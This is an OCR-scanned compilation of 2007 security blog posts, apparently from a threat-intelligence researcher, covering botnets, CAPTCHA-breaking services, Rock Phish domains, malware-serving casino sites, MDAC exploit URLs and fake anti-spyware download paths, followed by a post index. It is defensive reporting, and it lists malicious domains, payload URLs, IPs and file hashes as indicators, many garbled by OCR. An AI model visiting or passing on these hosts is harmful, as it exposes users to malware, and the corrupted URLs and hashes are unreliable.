include e.g.: Slow Internet connection, strange browser 
behavior (home page change, new windows, unknown plug¬ 
ins), disabled anti-virus software; unknown autostart 

programs etc. " 
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Here's the entire publication - M [4]Botnets - The Silent 
Threat" by David Barroso. 

1 . 

http://www.enisa.eurooa.eu/ paa es/Q2_Ql press 2007 11 27 
botnets.html 







2. http://ddanchev.blo as DOt.com/2007/Q9/ PO Pular-web- 
malware-exploitation.html 


3. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-increasin a .html 

4. 

http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_ pp_b 

otnets.pdf 
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A TrustedSource for Threats Intell Data (2007-11-27 
22:52) 

Following [l]the series of posts on [2]early warning security 
events systems, Secure Computing [3]have just an¬ 
nounced a major upgrade of their [4]threat intell service : 

" Secure Computing's [5]TrustedSource acts like a satellite 
advanced-warning system for the Internet that detects 
suspicious behavior patterns at their origins, and then 
instructs security devices to take corrective precautions or 
action," 

said Dr. Phyllis Schneck, vice president of research 
integration for Secure Computing. "TrustedSource pinpoints 
reputation by looking at behavior and specific factors such 
as traffic volumes, patterns and trends, and enabling it to 
rapidly identify deviations from the norm on a minute-by- 
minute basis. " 

I've already mentioned the radical perspective of 
integrating all the publicly known IPs with bad reputation, 
and sort of ignoring their online activities in order to 















prevent common problems such as click fraud for instance. 
Think from the end user's perspective, what's the worst 
thing that could happen to both the average and 
experienced end user? Try 

witnessing the situation when a known to be infected with 
malware end user [6]starts receiving messages like these, 

and will continue to receive them until a certain action is 
taken presumably disinfecting themselves. Of course, it's 

more complex than it sounds, but start from the basics in 
terms of the incentives for end users to disinfect 
themselves, the masses of which aren't that very socially 
oriented unless of course it's global warming and the 
possibility for a 

white Christmas you're talking about. Issuing an "[7]lnternet 
Driver's License" wouldn't work on an international scale, 
and even if it works on a local scale somewhere in the world, 
it wouldn't really matter, since you'll have the rest of the 
648 

world driving unsafely, and you'll be the only country which 
has fastened its seat belt. Here's [8]an example of such 
mode of thinking. 

1. http://ddanchev.blo as oot.com/20Q7/ll/vet-another- 
malware-outbreak-monitor.html 

2. http://ddanchev.blo as pot.com/2QQ7/Q6/earlv-warnin a- 
securitv-event-svstems.html 

3. 

http://monev.cnn.eom/news/newsfeeds/articles/marketwire/Q 

332356.htm 















4. http://www.eweek.eom/article2/0 . 1895 . 222239Q . 00.as D 

5. http://trustedsource.or g/ 

6. http://www.mustap.com/media/ a oo a levirus. aif 

7. 

http://www.wired.com/politics/securitv/news/2QQ7/Q6/bot_st 

rate av 

8. http://ddanchev.blo as pot.com/2007/Q7/insecure- 
bureaucracv-in- a ermanv.html 
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Which CAPTCHA Do You Want to Decode Today? 
(2007-11-28 23:12) 

Once you anticipate your success, you logically start putting 
more efforts into achieving a decent level of efficiency in the 
process of [l]breaking CAPTCHA, now that's of course in 
between commercializing your know-how. CAPTCHA 

breaking or decoding on demand has been [2]a reality for a 
while, with malicious parties empowered by ^propri¬ 
etary tools, publicly available [4]DIY CAPTCHA breakers, or 
services like this one doing it on demand. 

The following service is offering the possibility for CAPTCHA 
decoding on a per web service basis, and enticing 

future customers by providing percentage of accuracy, the 
price, and the ease of difficulty of breaking it. CAPTCHA 




















decoding is listed for the following services : 9you, tiancity, 
cncard, the9, kingsoft, taobao, dvbbs, shanda, csdn, 
chinaren, monter, and baidu. The hardest to break 
CAPTCHAs mentioned are those of Yahoo, Hotmail, QQ, 
Google. 

Moreover, Ticketmaster's the most expensive one, followed 
by Ebay's CAPTCHA decoding process. 

What happens when malicious parties cannot directly 
decode the CAPTCHA? They figure out ways to adapt to 

the situation, namely by enjoying the benefits of the human 
factor in the process while sacrificing some of the 

efficiency, but continuing to achieve their objective. 

1. http://ddanchev.blo as oot.com/2QQ7/03/vladuzs-eba v- 
ca ptcha- pp pulator.html 

2. http://www.eweek.eom/article2/Q . 1895 . 2211589 . Q0.as p 

3. http://ddanchev.blo as pot.com/2007/Q9/spammers-and- 
phishers-breakin a -captchas.html 

4. http://ddanchev.blo as pot.com/2QQ7/10/div-captcha- 
breakin a -service.html 
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66.1 Host Locked (2007-11-28 23:39) 

Having found a static pattern for identifying a [l]Rock Phish 
domain a couple of months ago in the form of the bogus 






















M [2]209 Host Locked" message, the [3]Rock Phishers seems 
to have picked up the finding and changed the default 
domain message to "66.1 Host Locked" as of recently. Here 
are the very latest Rock Phish domains using this : 

business-eb.bbt.com.4rrt.es 

ntu3otl.com 

nikogonet.com 

ne5oe.com 

nod-for-pc.com 

sparkasse.de.4rrt.es 

marip.com.es 

Moreover, a [4]recently released survey results by 
Cloudmark, whose study into the [5]Economics of Phishing 
is also 

worth going through, indicates that current and prospective 
customers of a certain brand lose trust in it, if they're 

exposed to phishing emails pretending to be from that 
brand : 

The survey revealed that: 

- 42 % of respondents surveyed feel that the trust in a 
brand would be greatly reduced if they received a phishing 
email claiming to be sent by that brand 

- 41 % of those surveyed felt that their trust in a bank would 
be greatly reduced if they received a phishing email 
claiming to be from that company , compared to 40 % who 
felt the same for an ISP, 36 % for an online shopping site 



and 33 % for a social networking site 

- 26 % of those surveyed feel that they are the party most 
responsible for protecting themselves from phishing 
attacks, with 23 % believing their Internet Service Provider 
(ISP) or email service provider is the most responsible and 
17 % 

thinking that the sender's ISP and email service provider 
holds the greatest responsibility 

The last point is perhaps the most insightful one, given it 
has to do with self-awareness and responsibility, forward¬ 
ing the responsibility to the provider of the email service, 
and best of all, seeking more responsibility in [6]fighting 
outgoing phishing and spam compared to incoming one. 

1. http://ddanchev.blo as pot.com/2Q07/Q9/ oav pal-and-eba v- 
phishin a -domams.html 

2. http://ddanchev.blo as pot.com/2007/09/2Q9-host- 
locked.html 

3. http://ddanchev.blo as pot.com/20Q7/10/assessin a -rock- 
phish-campai a n.html 

4. 

http://www.cloudmark.com/serviceproviders/media/releases/ 

?release=2QQ7-ll-26 

5. http://ddanchev.blo as pot.com/2007/Q8/economics-of- 
phishin a .html 

6. http://www.windowsecuritv.com/articles/Popular- 
S pammers-Strate a ies-Tactics.html 



























Malware Serving Online Casinos (2007-11-30 00:04) 

[l]Don't play poker on an infected table part two. The 
following three online casinos are currently serving 
embedded 

malware in the form of IFRAMES and the average javascript 
obfuscation. 

The first one is poker.gagnantscasino.com 

(213.186.33.4) with current obfuscation loading statistics- 

gdf.cn/ad/index.php (116.0.103.133) where another 
obfuscation loads, deobfuscated attempts to load 
p423ck.exe 

(Zlob) at statistics-gdf.cn/ad/load.php, playing around 
with the host for too long results in zero malicious activity, 
at least they make you think so. Here's another internal URL 

statistics-gdf.cn/ad/index.php7com 

Detection rate : Result: 7/32 (21.88 %) 

File size: 43008 bytes 

MD5: 08f445712adcef5ef091378c51bbbaaa 

SHA1: 3478fe6a600251b2eel47dbd50eaf4f204a884cb 

Last week's obfuscation at this online casino was pointing to 

traffmaster.biz/ra/in.cgi?5 which is now down. 

The second casino is fabispalmscasino.com 

(82.165.121.138) with current obfuscation attempting to 


connect 


to the now down statlcount.net/strong, a host residing 
on a netblock I covered before showcasing [2]a scammy 

ecosystem. The third one is sypercasino.com which was 
resolving to 203.117.111.102 early this week, and taking 

advantage of WebAttacker at 

sypercasino.com/biling/index.php. Now it resolves to 
58.65.236.10 and promotes 

banner, casino. com/cgi-bin/SetupCasino.exe 
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Detection rate: 9/32 (28.13 %) 

File size: 194077 bytes 

MD5: 26da6f81349ff388d08280ababab9150 

SHA1: f20e8fee439264915710f9478ecle74583563851 

It's interesting to monitor how people behind these 
manually change the obfuscations to further expand their 

connections with other scammers, or services and attack 
approaches they use, and even more interesting to see it 

happen [3]on-the-fly just like [4]meds247.org for instance. 

Don't play poker on an infected table. 

1. http://ddanchev.blo as pot.eom/2007/09/dont-pla v- poker- 
on-infected-table.html 






2. http://ddanchev.blo as DOt.com/20Q7/ll/scamm v- 
ecosvstem.html 


3. http://ddanchev.blo as pot.com/2QQ7/lQ/love-is- 
ps vchedelic-too.html 

4. http://ddanchev.blo as pot.com/2QQ7/ll/mana a ed-fast- 
f1ux-provider.html 
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Censoring Web 2.0 - The Access Denied Map (2007- 
12-03 17:23) 

Remember the [l]World's Internet Censorship Map? This is 
[2]a niche version of it that's " mapping the online 
censorship and anti-censorship efforts related to the Web 
2.0". Compared to, for instance, [3]lrrepressible, whose idea 
is to take advantage of the long-tail of anti-censorship by 
allowing everyone to embedd a badge that's spreading 

censored content, the Global Voices Advocacy " seeks to 
build a global anti-censorship network of bloggers and 
online activists dedicated to protecting freedom of 
expression and free access to information online. " and aims 
to act as a vehicle to communicate the censored information 
to the rest of the world, a far more pragmatic approach than 

having the censored bloggers figure out how to post the 
facts online - they'll simply forward them to the GVA. 














And just as important it is to take advantage of the wisdom 
of crowds, whose [4]collective intelligence can in 

fact act as an early warning system, it's also important to 
[5]educate those who cannot freely express their opinion 

on the process of expressing it 

1. http://ddanchev.blo as oot.com/2QQ6/Q6/worlds-internet- 
censorship-map.html 

2. http://advocac v.a lobalvoicesonline.or g /maps/ 

3. http://irrepressible.info/ 

4. http://ddanchev.blo as pot.com/2QQ6/ll/ a lobal-map-of- 
securitv-incidents-and.html 

5. http://ddanchev.blo as pot.com/2QQ7/lQ/evervones- a uide- 
to-b v- passin a -internet.html 
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MDAC ActiveX Code Execution Exploit Still in the 
Wild (2007-12-05 18:50) 

Who needs zero day vulnerabilities when the average end 
user is still living in the perimeter defense world and 

believes that security means having a firewall and an anti 
virus software running only? Now that's of course a rhetoric 
question given how [ljmodern malware is either blocking 
the update process of these applications, or shutting them 

down almost by default these days. 

























The following URLs are currently active and exploiting 
[2]CVE-2006-0003, and despite that it was patched in 

11 April, 2006, the last quarter of 2007 showcased the 
malware authors simplistic assumption that outdated but 

unpatched vulnerabilities can be just as effective as zero 
day ones, and when the assumption proved to be true - take 

Storm Worm's use of outdated vulnerabilities as the best 
and most effective example - it automatically [3]lowered 

the entry barriers into the world of malware, breaking 
through the myth that it's zero day vulnerabilities acting as 

they key success factors for a malware embedded attack on 
a large scale : 

dgst.cgs.gov.cn/docc/index.htm 

dhyjagri.gov.cn/program/images/img/New/index.htm 

sell.c2bsales.com/look.htm 

nesoy.com/svcdir/index.htm 

qyxjxx.com/admin/inc/index.htm 

xi530.com 

jzkj.icp365.cn/index.htm 

52fans.net 

218.84.59.218/img/c/ 

918a.com.cn/123/index.htm 
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flch.net/img/img/liqiuf.htm 

jiashiyin.com/qq/index.htm 

flymir2.com/liouliang/mama/index.htm 

22229682.com/pop/20. htm 

heitianshi.cn/love/index.htm 

jm.xiliao.cc/windows/vip.htm 

90to.com/qq/index.htm 

cmctn.com 

jcqing.com/mm/index. htm 

chinesefree webs. com/admin88/2. htm 

These are all courtesy of what looks like Chinese folks, and 
represent a good example of what [4]malicious economies 

of scale are as a concept that emerged during 2007. Years 
ago, when a vulnerability was found and exploit released, 

malicious parties were quickly taking advantage of the 
"window of opportunity" following the myth that the more 
publicity the vulnerability receives, the more useless it will 
get, given more people will patch. That's such a wishful 
thinking, one [5]the people behind Storm Worm apparently 
[6]perceived as [7]FUD-ish one, and by [8]not following it, 


ended up with operating [9]the largest botnet known for the 
time being - a botnet that was built on the foundations 

of outdated vulnerabilities pushed through emails, using 
sites as the infection vector, and not a single zero day one. 

How are risks hedged? Risks are hedged by following the 
simple diversification principle, which from a mali¬ 
cious perspective means increasing the probability for 
success. By using a single exploit URLs like the MDAC in this 

case, the chances for success are much lower compared to 
diversification of the "exploits set", a daily reality these days 
thanks to the emerging malicious economies of scale 
mentality in the form of web exploitation kits such as 

[10]MPack, [ll]lcePack, [12]WebAttacker, the [13]Nuclear 
Malware Kit and [14]Zunker as the most popular ones. 

Here's a related article - "[15]Zero-Day Exploits on The 
Decline" : 

" One of the reasons is that bad guys don't have to use 
them (zero day)," said Skoudis, who also founded 
information security consultancy Intelguardians. For 
example, he said, the Storm worm propagates itself though 
users 

clicking on an e-mail link, and does not require a zero-day 
exploit to function. "When simple techniques work, there is 
no need to unfurl zero-days," Skoudis said. "Attackers can 
just save them for more targeted attacks. " 

So, how did the people behind Storm Worm ended up with 
the world's largest botnet? They simply didn't 



believe in the effectiveness of [16]populist generalizations 
of security in the form of patching, and abused the 

miscommunication between the industry that's still 
preaching perimeter defense is the panacea of security, and 
the 

end user, the one whose Internet connectivity results in 
[ 17]alI the spam, phishing and malware we're all receiving, 

by stopping to target what the solutions protect from, and 
migrating to niche attack approaches to use as infection 

vectors - today's [ 18]client side vulnerabilities courtesy of a 
malware exploitation kit that were found embedded on 

the majority of [19]infected web sites incidents I've been 
assessing for the last couple of months. 

1. http://ddanchev.blo as oot.com/2QQ7/lQ/di v-a erman- 
malware-dro p per.html 

2. http://secunia.com/cve_reference/CVE-20Q6-QQQ3/ 

3. http://seclists.or a /fulldisclosure/2QQ7/Au a /Q411.html 
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4. http://ddanchev.blo as pot.com/2QQ7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

5. http://ddanchev.blo as pot.com/2Q07/Q8/storm-worm- 
malware-back-in- a ame.html 

6. http://ddanchev.blo as pot.com/2007/Q8/offensive-storm- 
worm-obfuscation.html 

























7. http://ddanchev.blo as pot.com/2QQ7/Q8/storm-worms-use- 
of-dro p ped-domains.html 

8. http://ddanchev.blo as pot.com/2007/Q9/storm-worms- 
ddos-attitude.html 

9. http://www.darkreadin a .com/document.as p? 
doc id = 138610&WT.svl = newsl 1 


10. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in- ital v.html 

11. http://ddanchev.blo as pot.com/2007/Q7/icepack- 
malware-kit-in-action.html 


12. http://ddanchev.blo as pot.com/2007/Q5/webattacker-in- 
action.html 


13. http://ddanchev.blo as pot.com/20Q7/Q8/nuclear- 
malware-kit.html 


14. http://ddanchev.blo as pot.com/2007/Q9/ a oo a le-hackin a- 
for-mpacks-zunkers-and.html 

15. 

http://www.esecurit v planet.com/trends/article. ph p/3713311 

16. http://ddanchev.blo as pot.eom/2007/09/ po pular-web- 
malware-explQitation.html 

17. http://ddanchev.blo as pot.com/20Q7/ll/are-vou-botnet- 
ina -with-me.html 

18. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-increasin a .html 


19. http://ddanchev.blo as pot.com/20Q7/ll/i-see-alive- 
iframes-evervwhere-part-two.html 
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A Diverse Portfolio of Fake Security Software (2007- 
12-07 22:46) 

The recently exposed [l]RBN's fake security software was 
literally just the tip of the iceberg in this ongoing practice of 
distributing spyware and malware under the shadow of 
software that's positioned as [2]anti-spyware and 

anti-malware one. The domain farm of fake security software 
which I'll assess in this post is worth discussing due 

to the size of its portfolio, how they've spread the 
[3]scammy ecosystem on different networks, as well as the 

directory structure they take advantage of, one whose 
predictability makes it faily easy to efficiency obtain all the 

fake applications. This particular case is also a great 
example of the typical for a [4]Rock Phish kit [5]efficiency 
vs quality [6]trade off, namely, all the binaries dispersed 
through the different domains are actually hosted on a 
single IP, and are identical. 

Who's hosting the malware and what directory 
structure per campaign do they use? 

It seems as content.onerateld.com (87.248.197.26) 

which is hosted at Limelight Networks is used in all the 
domains as the central download location. The directory 
structure is as follows : 

content.onerateld.com/antiworm2 008.com/Anti Worm2008/i 
nstall en.exe 


content. onerateld.com/avsystemcare.com/AVSystemCare/in 
stall _en.exe 

content.onerateld.com/winsecureav.com/WinSecureAv/instal 
I _en.exe 

content.onerateld.com/goldenantispy.com/GoldenAntiSpy/in 
stall _en.exe 

content.onerateld.com/menacerescue.com/MenaceRescue/in 
stall _en.exe 
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content.onerateld.com/antispywaresuite.com/AntiSpywareS 
uite/install _en.exe 

content.onerateld.com/trojansfilter.com/TrojansFilter/install 

_en.exe 

content.onerateld.com/bestsellerantivirus.com/BestsellerAnt 
ivirus/install _en.exe 

Therefore, if you have secureyourpc.com the directory 
structure would be 

/SecureYourPC. com/SecureYourPC/insta II 
_en.exe 

Sample domains portfolio of digitally alike samples 
of each of these : 

antivirusfiable.com 

antivirusmagique.com 


bastioneantivirus.com 



gubbishremover.com 

pchealthkeeper.com 

securepccleaner.com 

storageprotector.com 

trustedprotection.com 

yourprivacyguard.com 

DNS servers further expanding the domains portfolio 

■ 

■ 

nsl.bestsellerantivirus.com 

ns2.bestsellerantivirus.com 

ns3.bestsellerantivirus.com 

ns4.bestsellerantivirus.com 

nsl.onerateld.com 

ns2.onerateld.com 

Main portfolio domain farm IPs : 

- [7]87.117.252.11 

- [8]85.12.60.22 

- [9]85.12.60.11 

- [10]85.12.60.30 

Laziness on behalf of the malicious parties in this campaign, 
leads to better detection rate, thus, they didn't 



hedge the risks of having their releases detected by 
diversifying not just the domains portfolio, but the actual 
binaries themselves. 

1. http://ddanchev.blo as pot.com/2QQ7/10/rbns-fake- 
securitv-software.html 

2. http://ddanchev.blo as pot.com/2QQ7/ll/but-of-course-im- 
infected-with-s o vwa re 18.html 

3. http://ddanchev.blo as pot.com/2QQ7/ll/scamm v- 
ecosvstem.html 

4. http://ddanchev.blo as pot.com/2QQ7/Q9/2Q9-host- 
locked.html 

5. http://ddanchev.blo as pot.com/2QQ7/ll/661-host- 
locked.html 

6. http://ddanchev.blo as pot.com/2QQ7/lQ/assessin a -rock- 
phish-campai a n.html 

7. 

http://irn a 225jma a eshack.us/im a 225/9795/portfoliQQlxp0. 

ung 

8 . 

http://im a 2 25 .ima a eshack.us/i m a 2 25/782 6/portfolioQ2ib8. p 
ng 

9. 

http://im a 225jma a eshack.us/im a 225/4622/portfoliQ03sw6. 

&ng 

10 . 

http://im a 2 25 .ima a eshack.us/i m a 225/794Q/portfolioQ4di6. p 
ng 
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• 2006 
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■ S ymantec's Invisible Bur g lar Game ( 2006-12-07 
15:45 ) 

■ S ymantec's Invisible Bur g lar Game ( 2006-12-07 
16:46 ) 

■ Censorin g Seductive Child Behaviour ( 2006-12- 
08 02:46 ) 

■ Censorin g Seductive Child Behaviour ( 2006-12- 
08 16:50 ) 

■ Current State of Internet l ihad (2006-12-10 
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10 16:55 ) 

■ Current State of Internet l ihad ( 2006-12-10 
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■ Phishin g Domains Hostin g Multiple Phishin g 
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■ Were vou Trackin g Santa's Location? (2007-01- 
04 14:39 ) 

■ Technical Analysis of the Sk v oe Tro i an (2007-01- 
04 15:00 ) 

■ Forei g n Intelli g ence Services and U.S 
Technolo g y Espiona ge ( 2007-01-07 18:20 ) 

■ Four Years of A p plication Pen Testin g Statistics 
( 2007-01-07 20:24 ) 

■ Web Economy Buzz Words Generator (2007-01- 
07 20:59 ) 

■ Sunday's Portion of Hahaha (2007-01-07 21:28 ) 

■ Visits to the White House Now Top Secret 
Information (2007-01-07 21:50 ) 

■ Russia's Lawful Interception of Internet 
Communications (2007-01-08 21:54 ) 

■ Iran Bans Purchase of Forei g n Satellite Data 
( 2007-01-08 22:53 ) 

■ Insider Sentiments around LA's Traffic Li ght 
S ystem (2007-01-10 00:03 ) 

■ Data Minin g Credit Cards for Child Porn 
Purchases ( 2007-01-10 00:14 ) 

■ Still Livin g in the Perimeter Defense World 
( 2007-01-10 00:19 ) 

■ E ves in London's Skv - Surveillance Poster 
( 2007-01-10 14:08 ) 

■ Preventin g a Massive al-Oaeda Cvber Attack 
( 2007-01-10 14:59 ) 

■ It's all About the Vision and the Coura g e to 
Execute it ( 2007-01-10 15:21 ) 

















































































■ Transferrin g Sensitive Military Technolo gy ( 2007- 
01-11 01 : 00 ) 

■ Head Mounted Surveillance System ( 2007-01-11 
01:32 ) 

■ Security Lifest vle(S) ( 2007-01-13 18:30 ) 

■ The Life of a Security Threat (2007-01-15 20:40 ) 

■ Inside an Email Harvester's Confi g uration File 
( 2007-01-17 13:55 ) 

■ Collected in the Wild (2007-01-17 14:58 ) 

■ Social En g ineerin g and Malware ( 2007-01-23 
20:07 ) 

■ Attack of the SEP Bots on the .EDU Domain 

( 2007-01-23 20:59 ) 

■ The Zero Dav Vulnerabilities Cash Bubble ( 2007- 
01-25 17:29 ) 

■ Who's Who on Information and Network Securit y 

in Euro pe ( 2007-01-25 17:36 ) 

■ Threats of Usin g Outsourced Software (2007-01- 
25 17:57 ) 

■ Testin g Anti Virus Software A g ainst Packed 
Malware ( 2007-01-25 18:30 ) 

■ Visual Thesaurus on Securit y ( 2007-01-26 
17:19 ) 

■ Clusterin g Phishin g Attacks (2007-01-26 18:06 ) 
Februar y 

■ PR Storm ( 2007-02-01 15:31 ) 

■ Old Media VS New Media (2007-02-01 15:58 ) 

■ The TalkRization of Mv Blo o ( 2007-02-01 18:18 ) 

■ Attack of the Bitin g UAVs ( 2007-02-02 18:40 ) 

■ Interactivit y b v Default (2007-02-06 19:38 ) 

■ Automated Detection for Patterns of Insecurities 

( 2007-02-08 21:15 ) 

■ Receivin g Everyone's Financial Statements 
( 2007-02-08 22:16 ) 

■ Overachievin g Technolo g y Companies ( 2007-02- 
12 13:39 ) 















































































■ Forensic Examination of Terrorists' Hard Drives 

( 2007-02-13 04:09 ) 

■ Gender Based Censorship in the News Media 
( 2007-02-13 17:48 ) 

■ Emer ging DDoS Attack Trends (2007-02-14 
00:27 ) 

■ She Loves Me . She Loves Me Not (2007-02-14 
23:13 ) 

■ Censorship in China - An Open Letter (2007-02- 
14 23:38 ) 

■ RFID Trackin g Miniaturization (2007-02-15 
01:07 ) 

■ The Electronic Frontier Foundation in Euro pe 

( 2007-02-15 16:29 ) 

■ Terrorism and Encr y ption ( 2007-02-16 20:44 ) 

■ Delicious Information Warfare - Friday 16th 
( 2007-02-16 22:24 ) 

■ M v Feed is on Fire . Mv Feed is on Fire! (2007-02- 
18 04:31 ) 

■ Bevond Traditional Advertisin g Packa g es (2007- 
02-18 04:58 ) 

■ Profilin g Ser ge v Brin (2007-02-18 05:45 ) 

■ Cuba's Internet Dictatorshi p ( 2007-02-19 23:08 ) 

■ The Phishin g Ecosystem (2007-02-21 11:15 ) 

■ Korean Zombies Behind the Root Servers Attack 

( 2007-02-22 17:32 ) 

■ Ima g e Blockin g in Email Clients and Web 
Services ( 2007-02-22 18:06 ) 

■ The RootLauncher Kit (2007-02-23 01:59 ) 

■ Characteristics of Islamist Websites ( 2007-02-23 
02:19 ) 

■ A Review of SiteAdvisor Pro (2007-02-23 03:09 ) 

■ Fake Terror SMS Sent to 10 . 000 People ( 2007-02- 
27 15:39 ) 

■ XSS Vulnerabilities in E-bankin g Sites (2007-02- 
27 16:14 ) 











































































■ Credit Card Data Clonin g Tactic ( 2007-02-27 
17:32 ) 

■ Storm Worm Switchin g Pro pag ation Vectors 
( 2007-02-28 16:40 ) 

■ Social En g ineerin g the Old Media ( 2007-02-28 
16:56 ) 

March 

■ AdSense Click Fraud Rates ( 2007-03-01 17:02 ) 

■ Real Time Censored URL Check in China (2007- 
03-02 17:20 ) 

■ Botnet Communication Platforms (2007-03-07 
11:24 ) 

■ Death is l ust an U pg rade ( 2007-03-07 12:21 ) 

■ USB Surveillance Sticks (2007-03-07 12:34 ) 

■ Documentary on ECHELON - The S ov S ystem 
( 2007-03-07 22:11 ) 

■ Distributed Computin g with Malware ( 2007-03- 
08 14:40 ) 

■ Stea ano araohv Ap plications Hash Set (2007-03- 
08 14:56 ) 

■ UK Telecoms Lack of Web Site Privac y ( 2007-03- 
08 15:07 ) 

■ Armed Land Robots ( 2007-03-09 23:45 ) 

■ J.K's Latest Military Satellite System ( 2007-03- 
10 00:04 ) 

■ Envv These Women Please (2007-03-10 00:20 ) 

■ Shots from the Malicious Wild West - Sample 
One (2007-03-10 18:16 ) 

■ Shots from the Malicious Wild West - Sample Two 
( 2007-03-10 19:07 ) 

■ Shots from the Malicious Wild West - Sample 
Three (2007-03-10 20:27 ) 

■ Photoshooin a Your Realit y ( 2007-03-10 20:45 ) 

■ Vladuz's Ebav CAPTCHA Pooulator ( 2007-03-10 
21:31 ) 











































































■ Ballistic Missile Defense En gag ement Points 
( 2007-03-11 21:33 ) 

■ Touchin g the Future of Productivit y ( 2007-03-12 
22:30 ) 

■ Goo a le Maos and Privac y ( 2007-03-12 22:47 ) 

■ Timeline of Iran's Nuclear Pro g ram (2007-03-12 
23:30 ) 

■ Threats of Usin g Outsourced Software - Part Two 
( 2007-03-14 17:23 ) 

■ Complexity and Threats Mind Ma pping ( 2007- 
03-19 16:42 ) 

■ Personal Data Security Breaches Spreadsheet 
( 2007-03-19 17:30 ) 

■ S pam Comments Attack on TechCrunch 

Continuin g ( 2007-03-19 17:49 ) 

■ Subconscious Search Monopoly Sentiments 
( 2007-03-19 18:26 ) 

■ The Under g round Economy's Su ppl y of Goods 
( 2007-03-19 23:17 ) 

■ ASCII Art Soam (2007-03-20 16:45 ) 

■ l ihadists Usin g Kaspersky Anti Virus (2007-03-20 
17:01 ) 

■ Video on Analyzin g and Removin g Rootkits 
( 2007-03-20 20:17 ) 

■ A Fortune 500 Blo gos ohere? Not Yet ( 2007-03- 

20 23:49 ) 

■ Unsi g ned Code Execution in Windows Vista 
( 2007-03-21 23:01 ) 

■ A Documentary on CCTVs in the U.K ( 2007-03- 

21 23:48 ) 

■ Zoom Zoom Zoom - Boom! (2007-03-22 00:04 ) 

■ Trickin g an UAV's Thermal Ima gery ( 2007-03-22 
20:41 ) 

■ Take this Malicious Site Down - Processin g 

Order. ( 2007-03-22 21:00 ) 

■ Ghosts in the Keyboard (2007-03-27 22:31 ) 














































































■ You've Got Somethin g in Your Eve (2007-03-27 
22:53 ) 

■ Real Time Soam Shreddin g ( 2007-03-28 14:14 ) 

■ IMSafer Now M vS oace Compatible ( 2007-03-30 
00:25 ) 

■ C vber Traps for Wannabe l ihadists (2007-03-30 
00:50 ) 

April 

■ C yberpunk is Dead! (2007-04-01 20:29 ) 

■ Takin g Down Phishin g Sites - A Business Model? 
( 2007-04-04 13:46 ) ~ 

■ Interactin g with Soam Emails (2007-04-04 
14:16 ) 

■ Hij ackin g Your Fear ( 2007-04-04 15:28 ) 

■ Lie Detectin g Software for Text Communications 
( 2007-04-09 17:10 ) 

■ Month of Malware Bu g s Comin g ( 2007-04-10 
14:47 ) 

■ Shots from the Malicious Wild West - Sample 
Four ( 2007-04-10 15:16 ) 

■ Mu j ahideen Secrets Encr y ption Tool (2007-04-12 
14:58 ) 

■ A Compilation of Web Backdoors (2007-04-20 
00:58 ) 

■ Shots from the Malicious Wild West - Sample 
Five ( 2007-04-20 02:24 ) 

■ Shots from the Malicious Wild West - Sample Six 
( 2007-04-20 03:06 ) 

■ Goo g le in the Future ( 2007-04-20 03:37 ) 

■ OSINTThrou g h Botnets (2007-04-23 18:06 ) 

■ Shots from the Malicious Wild West - Sample 
Seven ( 2007-04-25 13:34 ) 

■ Outsourcin g The S p yin g on Your Wife ( 2007-04- 
26 02:12 ) 

■ Malware Infected Removable Media (2007-04-26 
02:38 ) 












































































■ Conventional Weaponry VS Cvber Terrorism 
( 2QQ7-Q4-26 02:54 ) 

■ Malicious Keywords Advertisin g ( 2007-04-30 
03:20 ) 

■ Video Demonstration of Vbootkit ( 2007-04-30 
21:07 ) 

■ Crv ptome Under Fire (2007-04-30 21:26 ) 

Ma v 

■ The Brand i ackin a Index ( 2007-05-02 02:35 ) 

■ Anti-Censorship Lifestyle (2007-05-02 22:06 ) 

■ Winamp PoC Backdoor and a Zero Da v ( 2007-05- 
04 04:53 ) 

■ A Chronolo g y of a Bomb Plot (2007-05-04 05:17 ) 

■ DDoS on Demand VS DDoS Extortion (2007-05- 
08 15:40 ) 

■ Disintermediatin g the Ma j or Defense Contractors 
( 2007-05-10 00:35 ) 

■ International Cr yptograph y Re g ulations Ma o 
( 2007-05-10 01:42 ) 

■ Defeatin g Virtual Keyboards ( 2007-05-10 16:18 ) 

■ Bio Brother Awards 2007 (2007-05-11 17:39 ) 

■ XSS The Planet (2007-05-14 17:26 ) 

■ Mind Ma p pin g Web 2.0 Threats (2007-05-14 
21:30 ) 

■ Samplin g I ihadists 1 IPs (2007-05-16 01:01 ) 

■ The l ihadist Security Encyclopedia (2007-05-16 
01:41 ) 

■ Visual Script Obfuscation (2007-05-16 02:10 ) 

■ Corporate Espiona g e Throu g h Botnets (2007-05- 
16 22:09 ) 

■ Yet Another Malware Cr v otor In the Wild (2007- 
05-17 13:36 ) 

■ Commercializin g Mobile Malware (2007-05-18 
18:14 ) 

■ Trickin g a Laptop's Fin ger print Authentication 
( 2007-05-19 22:49 ) 























































































■ MvS oace's Sex Offenders Problem ( 2007-05-21 
20:18 ) 

■ A Malware Loader For Sale (2007-05-22 11:46 ) 

■ A Client A p plication for "Secure" E-bankin a? 
( 2007-05-22 12:17 ) 

■ Counter Espiona g e Tips from the Cold War 
( 2007-05-23 20:03 ) 

■ I ihadists 1 Anonymous Internet Surfin g 
Preferences ( 2007-05-23 21:13 ) 

■ Microsoft's Forefront Ad Campai gn ( 2007-05-23 
22:34 ) 

■ Goo a le Hackin g for Vulnerabilities ( 2007-05-29 
12:31 ) 

■ Phrack Ma g azine's Latest Issue ( 2007-05-29 
16:49 ) 

■ Reverse En g ineerin g the ANI Vulnerabilit y 
( 2007-05-30 01:31 ) 

■ The Reven g e of the Waitress (2007-05-30 12:44 ) 

■ The WebAttacker in Action ( 2007-05-30 21:06 ) 

■ MSN Soammin o Bot ( 2007-05-31 21:20 ) 
une 

■ Data Breach Sample Letters of Notification 
( 2007-06-04 15:15 ) 

■ o Ot XSSed? ( 2007-06-04 15:48 ) 

■ CIA's "Upcomin g " Black Ops A g ainst Iran ( 2007- 
06-06 13:37 ) 

■ Security Cartoons (2007-06-06 13:47 ) 

■ An Analysis of the Technical Mu i ahid - Issue Two 
( 2007-06-07 13:41 ) 

■ Censorin g Flickrin China (2007-06-12 12:55 ) 

■ Homosexual Warfare ( 2007-06-12 13:50 ) 

■ DIY Malware Dro p pers in the Wild ( 2007-06-12 
20:50 ) 

■ Israeli Reconnaissance Satellite C&C - Video 

( 2007-06-18 12:29 ) 












































































■ Massive Embedded Web Attack in Ital y ( 2007- 
